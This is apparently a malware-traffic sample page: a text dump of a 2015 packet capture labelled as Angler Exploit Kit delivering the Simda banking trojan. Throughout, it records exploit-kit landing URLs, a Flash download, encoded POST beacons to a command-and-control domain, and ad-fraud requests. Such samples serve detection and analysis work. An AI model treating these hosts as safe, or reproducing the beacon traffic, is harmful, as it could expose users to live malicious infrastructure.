Text Example

Angler Exploit Kit EK Deliver Simda Malware Banking Trojan PCAP file download traffic sample

Download Attachments

  • 1 pcap 38
    Date added: May 24, 2019 12:01 am Added by: admin File size: 2 MB Downloads: 11

2015-03-27 11:14:44.276370 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [.], ack 1, win 256, length 0
E..(.A@....O..z"..D..).P.Cy.....P.............
2015-03-27 11:14:44.283482 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [P.], seq 1:356, ack 1, win 256, length 355: HTTP: GET /closers_retrenchment_delineation/6715645798 HTTP/1.1
E....K@.......z"..D..).P.Cy.....P....;..GET /closers_retrenchment_delineation/6715645798 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: [[[[[[[[[ redacted ]]]]]]]]]]
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: kiyoshi.noahsbootandshoerepair.com
Connection: Keep-Alive

2015-03-27 11:14:44.539699 IP 188.138.68.234.80 > 192.168.122.34.49193: Flags [.], ack 356, win 123, length 0

2015-03-27 11:14:46.115369 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [.], ack 95637, win 256, length 0
E..(..@.......z"..D..).P.C{...5 P...y.........
2015-03-27 11:14:47.983190 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [P.], seq 356:767, ack 95637, win 256, length 411: HTTP: GET /6wPrlh_lsbc-9hRJiDNmuto00SCpbQ66ZWFxssA_s5dM2-R_ HTTP/1.1
E.....@.......z"..D..).P.C{...5 P...Ba..GET /6wPrlh_lsbc-9hRJiDNmuto00SCpbQ66ZWFxssA_s5dM2-R_ HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://kiyoshi.noahsbootandshoerepair.com/closers_retrenchment_delineation/6715645798
x-flash-version: 13,0,0,182
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: kiyoshi.noahsbootandshoerepair.com
Connection: Keep-Alive


2015-03-27 11:14:48.180800 IP 192.168.122.34.49206 > 188.138.68.234.80: Flags [.], ack 1, win 256, length 0
E..(..@....v..z"..D..6.P...5..BDP...."........
2015-03-27 11:14:48.181788 IP 192.168.122.34.49206 > 188.138.68.234.80: Flags [P.], seq 1:133, ack 1, win 256, length 132: HTTP: GET /VpP2cGkL0OoIlocWqM8mNHcJ7wyQxQrHbU6TN_eDT6KG75FD HTTP/1.1
E.....@.......z"..D..6.P...5..BDP.......GET /VpP2cGkL0OoIlocWqM8mNHcJ7wyQxQrHbU6TN_eDT6KG75FD HTTP/1.1
Connection: Keep-Alive
Host: kiyoshi.noahsbootandshoerepair.com

2015-03-27 11:14:48.207298 IP 188.138.68.234.80 > 192.168.122.34.49193: Flags [.], seq 95637:97004, ack 767, win 131, length 1367: HTTP: HTTP/1.1 200 OK
E....&@.2.X...D...z".P.)..5 .C|.P...e...HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Fri, 27 Mar 2015 15:14:48 GMT
Content-Type: application/x-shockwave-flash

Content-Length: 52272

2015-03-27 11:14:52.508197 IP 192.168.122.34.49219 > 208.113.226.171.80: Flags [.], ack 1, win 256, length 0
E..(..@....[..z".q...C.P=.,.u..RP....a........
2015-03-27 11:14:52.509414 IP 192.168.122.34.49219 > 208.113.226.171.80: Flags [P.], seq 1:101, ack 1, win 256, length 100: HTTP: POST /timezone/0/0 HTTP/1.1
E.....@.......z".q...C.P=.,.u..RP...I#..POST /timezone/0/0 HTTP/1.1
Connection: Keep-Alive
Content-Length: 0
Host: www.earthtools.org

2015-03-27 11:14:52.845296 IP 208.113.226.171.80 > 192.168.122.34.49219: Flags [.], ack 101, win 115, length 0
E..(7E@./.&..q....z".P.Cu..R=.,iP..s....
2015-03-27 11:14:52.845577 IP 208.113.226.171.80 > 192.168.122.34.49219: Flags [P.], seq 1:696, ack 101, win 115, length 695: HTTP: HTTP/1.1 200 OK
E...7F@./.#..q....z".P.Cu..R=.,iP..s....HTTP/1.1 200 OK

Date: Fri, 27 Mar 2015 15:14:52 GMT

2015-03-27 11:14:53.309622 IP 192.168.122.34.49220 > 23.37.56.11.80: Flags [.], ack 1, win 256, length 0
E..(..@...k...z".%8..D.P/......SP...O.........
2015-03-27 11:14:53.310410 IP 192.168.122.34.49220 > 23.37.56.11.80: Flags [P.], seq 1:126, ack 1, win 256, length 125: HTTP: POST /stats/eurofxref/eurofxref-hist-90d.xml HTTP/1.1
E.....@...j...z".%8..D.P/......SP...X...POST /stats/eurofxref/eurofxref-hist-90d.xml HTTP/1.1
Connection: Keep-Alive
Content-Length: 0
Host: www.ecb.europa.eu

2015-03-27 11:14:53.478277 IP 23.37.56.11.80 > 192.168.122.34.49220: Flags [.], ack 126, win 457, length 0
E..(..@.9..F.%8...z".P.D...S/...P...N...
2015-03-27 11:14:53.578255 IP 23.37.56.11.80 > 192.168.122.34.49220: Flags [.], seq 1:1368, ack 126, win 457, length 1367: HTTP: HTTP/1.1 200 OK
E.....@.9....%8...z".P.D...S/...P...f...HTTP/1.1 200 OK

Server: Apache/2.2.3 (Linux/SUSE)

2015-03-27 11:14:58.577462 IP 192.168.122.34.49228 > 85.25.104.159.80: Flags [.], ack 1, win 256, length 0
E..(..@....{..z"U.h..L.P.B.~6t..P...Ik........
2015-03-27 11:14:58.578833 IP 192.168.122.34.49228 > 85.25.104.159.80: Flags [P.], seq 1:136, ack 1, win 256, length 135: HTTP: POST / HTTP/1.1
E.....@.......z"U.h..L.P.B.~6t..P....Y..POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Length: 216
Host: wrzvmyfzckdgcij4.com

2015-03-27 11:14:58.579133 IP 192.168.122.34.49228 > 85.25.104.159.80: Flags [P.], seq 136:352, ack 1, win 256, length 216: HTTP
E.....@.......z"U.h..L.P.B..6t..P...k...SNE1dax2kTrCO0/dykZ+x8JvoeshsqxF8Bud4at1aDiBWU9qB6+uhOMFH98SexCc+vJywoAb8HQv8VDbLgLc25bZvceJUzuvnAqW58q0Pwbl5Z2luX50C3YR+Ef3gJUBFHY5k6LtQ0Uxou9+4TQEZzORJaqZn7WT9wqKE1eM8LYMnmPmnpobOT6M3r+PF5oJnTmoAQ1EthyxMm7LjPYf2g==

2015-03-27 11:14:58.778906 IP 85.25.104.159.80 > 192.168.122.34.49228: Flags [.], ack 136, win 123, length 0

2015-03-27 11:15:00.349286 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [.], ack 1, win 256, length 0
E..(..@....@..z"U.h..N.P...H.1..P....i........
2015-03-27 11:15:00.350212 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 1:136, ack 1, win 256, length 135: HTTP: POST / HTTP/1.1
E.....@.......z"U.h..N.P...H.1..P....R..POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Length: 172
Host: wrzvmyfzckdgcij4.com

2015-03-27 11:15:00.350542 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 136:308, ack 1, win 256, length 172: HTTP
E.....@.......z"U.h..N.P.....1..P.......YD4viggOIh++07v2Um1gIx11St/8XC8saF5uX0YI4AMVOHQ25cUjc+t23u3BZI27fiaqpkXY6wVteS6MqFLJlvHwM6fGGZVitbFgc8uerOJBrGG5iaFm5jNsDn5NWX3yyd0SwE47HcjkQ1DdnT7on0O8tT20+FuDVEr4npZm0eE=

2015-03-27 11:15:00.643584 IP 85.25.104.159.80 > 192.168.122.34.49230: Flags [.], ack 136, win 123, length 0

2015-03-27 11:15:03.031960 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [.], ack 513599, win 1368, length 0
E..(..@....K..z"U.h..N.P...{.9..P..X..........
2015-03-27 11:15:03.227353 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 308:443, ack 513599, win 1368, length 135: HTTP: POST / HTTP/1.1
E.....@.......z"U.h..N.P...{.9..P..X....POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Length: 256
Host: wrzvmyfzckdgcij4.com

2015-03-27 11:15:03.227511 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 443:699, ack 513599, win 1368, length 256: HTTP
E..(..@....I..z"U.h..N.P.....9..P..X....GpbZQGaQgmfu/Eh0mvebAJPknXzYE1Vhzceud0DQnHPICCkYG2flJ1aMWtq5BMcqrPr7wo7Fr53uEdowJXndCecd5Aj+eFv4Wsy43MaZDqFqB2/ld1bLXKa8U5EUlr8hLOsU8Q/e3pN/wf2SWbmmm5Rci6Hw1izzlJ/rY8zpaDl3n3E2sBtF6EX0+M1Eu4cE82G4ZcE3qY2Ld94kApgQVjW/Wu5p26YOwUZB2mTcGnM0AT0qyJzKE77lTaBJkHH1

2015-03-27 11:15:03.427513 IP 85.25.104.159.80 > 192.168.122.34.49230: Flags [.], ack 443, win 140, length 0

2015-03-27 11:15:09.727441 IP 192.168.122.34.49241 > 188.138.25.46.80: Flags [.], ack 1, win 256, length 0
E..(..@.......z".....Y.P...Gv.".P.............
2015-03-27 11:15:09.727832 IP 192.168.122.34.49241 > 188.138.25.46.80: Flags [P.], seq 1:407, ack 1, win 256, length 406: HTTP: POST /news.php HTTP/1.0
E.....@.......z".....Y.P...Gv.".P.......POST /news.php HTTP/1.0
Host: fasion.arunthati.co.uk
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 698
Content-Type: application/octet-stream

2015-03-27 11:15:21.224812 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 834:1562, ack 742017, win 2002, length 728: HTTP
E.....@.......z"U.h..N.P.....=.GP.......

2015-03-27 11:15:21.368855 IP 85.25.104.159.80 > 192.168.122.34.49230: Flags [.], ack 834, win 156, length 0

2015-03-27 11:18:03.853669 IP 192.168.122.34.49244 > 78.46.107.218.80: Flags [.], ack 1, win 256, length 0
E..( '@.......z"N.k..\.P..;x.R..P...).........
2015-03-27 11:18:03.854165 IP 192.168.122.34.49244 > 78.46.107.218.80: Flags [P.], seq 1:178, ack 1, win 256, length 177: HTTP: GET /ads.php?sid=1923 HTTP/1.1
E... (@....#..z"N.k..\.P..;x.R..P....x..GET /ads.php?sid=1923 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: geeksdronesfamily.net

2015-03-27 11:18:04.090363 IP 85.25.107.67.80 > 192.168.122.34.49245: Flags [S.], seq 307298518, ack 567770301, win 29200, options [mss 1367,nop,nop,sackOK,nop,wscale 9], length 0
E..4
.@.0.D.U.kC..z".P.].Q..!.|...r........W.......
2015-03-27 11:18:04.090742 IP 192.168.122.34.49245 > 85.25.107.67.80: Flags [.], ack 1, win 256, length 0
E..( )@.......z"U.kC.].P!.|..Q..P...AC........
2015-03-27 11:18:04.091262 IP 192.168.122.34.49245 > 85.25.107.67.80: Flags [P.], seq 1:174, ack 1, win 256, length 173: HTTP: GET /ads.php?sid=1923 HTTP/1.1
E... *@.......z"U.kC.].P!.|..Q..P.......GET /ads.php?sid=1923 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: sandsofafrica.net

2015-03-27 11:18:04.218709 IP 162.244.34.133.80 > 192.168.122.34.49246: Flags [S.], seq 2988324121, ack 1071872369, win 29200, options [mss 1367,nop,nop,sackOK,nop,wscale 9], length 0
E..4
.@.3.<..."...z".P.^..5.?.yq..r........W.......
2015-03-27 11:18:04.219113 IP 192.168.122.34.49246 > 162.244.34.133.80: Flags [.], ack 1, win 256, length 0
E..( +@....`..z".."..^.P?.yq..5.P...MT........
2015-03-27 11:18:04.219642 IP 192.168.122.34.49246 > 162.244.34.133.80: Flags [P.], seq 1:171, ack 1, win 256, length 170: HTTP: GET /ads.php?sid=1923 HTTP/1.1
E... ,@.......z".."..^.P?.yq..5.P.......GET /ads.php?sid=1923 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: koreandust.com

2015-03-27 11:18:32.826046 IP 192.168.122.34.49263 > 136.243.241.27.80: Flags [P.], seq 1:469, ack 1, win 64249, length 468: HTTP: GET /bd18f8e13790967b20038d71ed0b3f70 HTTP/1.1
E... .@...:n..z".....o.P..N..<1.P....w..GET /bd18f8e13790967b20038d71ed0b3f70 HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://f5.dbac60.dcee2.0d.30.d7f0a.e311eaa.810.yy0w6j4j.changesmoves.in/?22504744544b4d4e4356434c5643564b0c414d4f
x-flash-version: 13,0,0,182
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: f5.dbac60.dcee2.0d.30.d7f0a.e311eaa.810.yy0w6j4j.changesmoves.in
Connection: Keep-Alive


2015-03-27 11:18:33.183843 IP 192.168.122.34.49265 > 78.46.107.218.80: Flags [.], ack 1, win 256, length 0
E..( .@....>..z"N.k..q.P7AB.ZEr.P.............
2015-03-27 11:18:33.184137 IP 192.168.122.34.49265 > 78.46.107.218.80: Flags [P.], seq 1:178, ack 1, win 256, length 177: HTTP: GET /ads.php?sid=1923 HTTP/1.1
E... .@.......z"N.k..q.P7AB.ZEr.P...)...GET /ads.php?sid=1923 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: geeksdronesfamily.net

2015-03-27 11:18:33.217857 IP 192.168.122.34.52660 > 224.0.0.252.5355: UDP, length 22
E..2 ......4..z"............^............wpad.....
2015-03-27 11:18:33.280227 IP 136.243.241.27.80 > 192.168.122.34.49264: Flags [.], ack 552, win 15400, length 0
E..(..@.3.........z".P.p.%..}X-P.<(.n..

2015-03-27 11:18:33.280608 IP 136.243.241.27.80 > 192.168.122.34.49263: Flags [.], seq 12518:13885, ack 469, win 15544, length 1367: HTTP

2015-03-27 11:18:35.340582 IP 192.168.122.34.49266 > 162.244.34.133.80: Flags [.], ack 1, win 256, length 0
E..( .@.......z".."..r.P.....%..P.............
2015-03-27 11:18:35.340943 IP 192.168.122.34.49266 > 162.244.34.133.80: Flags [P.], seq 1:326, ack 1, win 256, length 325: HTTP: GET /r.php?key=934b952b5596d97433bf5cd2a08a1dd3 HTTP/1.1
E..m .@....v..z".."..r.P.....%..P...g...GET /r.php?key=934b952b5596d97433bf5cd2a08a1dd3 HTTP/1.1
Accept: */*
Referer: http://newblackfridayads.com/search.php
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: koreandust.com
Connection: Keep-Alive
